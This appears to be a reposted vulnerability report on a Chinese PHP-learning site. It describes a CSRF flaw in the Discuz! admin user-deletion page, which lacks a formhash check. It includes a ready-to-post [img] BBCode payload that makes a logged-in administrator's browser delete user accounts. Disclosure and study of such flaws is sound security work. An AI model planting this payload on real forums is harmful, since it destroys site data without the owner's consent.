来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 后台删除用户页面只是单纯做了submitcheck( submit , 1),按之前的说明,程序这里没有判断formhash,也就是说可以用于CSRF不过利用这个漏洞前提是要管理员登陆了后台,不过这个不会很麻烦...
上次那个漏洞:Discuz! X2.5 / X3 / X3.1中CSRF攻击防御可被绕过 :http://www.2cto.com/Article/201405/300378.html 你们回复说是程序员认为不需要校验才这么设置……那这回应该算是你设计问题了吧
发帖插入 Discuz! 代码:
[img]admin.php?frame=no&action=members&operation=clean&submit=1&uidarray=1&confirmed=yes[/img]
formhash判断 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com